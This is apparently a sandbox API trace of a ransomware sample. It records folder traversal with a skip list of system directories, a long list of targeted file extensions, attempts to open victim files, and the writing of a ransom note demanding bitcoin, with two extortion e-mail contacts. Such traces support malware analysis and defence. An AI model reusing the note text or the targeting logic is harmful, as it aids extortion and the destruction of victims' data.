	[0167.786] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18a184 | out: lpFindFileData=0x18a184*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1
	[0167.786] lstrcmpW (lpString1="en-US", lpString2="..") returned 1
	[0167.786] lstrcmpW (lpString1="en-US", lpString2=".") returned 1
	[0167.786] lstrcpyW (in: lpString1=0x189b6c, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}"
	[0167.787] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\"
	[0167.787] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\", lpString2="en-US" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US"
	[0167.787] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US"
	[0167.787] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\"
	[0167.787] lstrcpyW (in: lpString1=0x188c54, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\"
	[0167.787] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*"
	[0167.787] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*"), lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660063, dwReserved1=0x370038, cFileName=".", cAlternateFileName="")) returned 0xfb90b0
	[0167.795] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*") returned 95
	[0167.795] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.796] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*", cchLength=0x5f | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*") returned 0x5f
	[0167.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.796] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="windows") returned 0x0
	[0167.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.796] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="boot") returned 0x0
	[0167.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.796] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="system volume information") returned 0x0
	[0167.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.796] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.796] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.797] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="temp") returned 0x0
	[0167.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.797] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="program files") returned 0x0
	[0167.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.797] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.797] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.798] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="appdata") returned 0x0
	[0167.798] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.798] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="application data") returned 0x0
	[0167.798] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.798] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="winnt") returned 0x0
	[0167.798] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.798] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="tmp") returned 0x0
	[0167.798] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.798] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="cache") returned 0x0
	[0167.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.799] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.799] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="webcache") returned 0x0
	[0167.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.799] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="inetcache") returned 0x0
	[0167.799] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.799] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="nvidia") returned 0x0
	[0167.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="packages") returned 0x0
	[0167.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="cookies") returned 0x0
	[0167.800] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.800] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\*.*", lpSrch="programdata") returned 0x0
	[0167.800] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbd313219, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0xbd313219, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd313219, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660063, dwReserved1=0x370038, cFileName="..", cAlternateFileName="")) returned 1
	[0167.800] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9eb0c2e2, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9eb0c2e2, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9eb0c2e2, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x660063, dwReserved1=0x370038, cFileName="resource.xml", cAlternateFileName="")) returned 1
	[0167.800] lstrcmpW (lpString1="resource.xml", lpString2="..") returned 1
	[0167.801] lstrcmpW (lpString1="resource.xml", lpString2=".") returned 1
	[0167.801] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\"
	[0167.801] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\", lpString2="resource.xml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml"
	[0167.801] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml") returned 104
	[0167.801] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.801] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\resource.xml", cchLength=0x68 | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml") returned 0x68
	[0167.801] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.801] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml", lpSrch="help_decrypt_your_files") returned 0x0
	[0167.801] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml" | out: lpString1="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml") returned="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"
	[0167.801] lstrlenW (lpString="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml") returned 104
	[0167.802] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.802] StrStrW (lpFirst=".xml", lpSrch=".") returned=".xml"
	[0167.802] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.802] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xml") returned=".xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0167.802] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.803] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.803] CreateFileW (lpFileName="c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0167.803] CloseHandle (hObject=0xffffffff) returned 1
	[0167.803] CloseHandle (hObject=0xffffffff) returned 1
	[0167.803] FindNextFileW (in: hFindFile=0xfb90b0, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9eb0c2e2, ftCreationTime.dwHighDateTime=0x1d112f1, ftLastAccessTime.dwLowDateTime=0x9eb0c2e2, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0x9eb0c2e2, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x536, dwReserved0=0x660063, dwReserved1=0x370038, cFileName="resource.xml", cAlternateFileName="")) returned 0
	[0167.804] FindClose (in: hFindFile=0xfb90b0 | out: hFindFile=0xfb90b0) returned 1
	[0167.804] FindClose (in: hFindFile=0xfb90b0 | out: hFindFile=0xfb90b0) returned 0
	[0167.804] lstrcpyW (in: lpString1=0x189064, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US"
	[0167.804] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\*.*"
	[0167.804] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.804] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.805] wsprintfW (in: param_1=0x188950, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\HELP_DECRYPT_YOUR_FILES.TXT") returned 119
	[0167.805] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-US\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\en-us\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x39c
	[0167.805] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.805] WriteFile (in: hFile=0x39c, lpBuffer=0x187d08*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x188c2c, lpOverlapped=0x0 | out: lpBuffer=0x187d08*, lpNumberOfBytesWritten=0x188c2c*=0xc46, lpOverlapped=0x0) returned 1
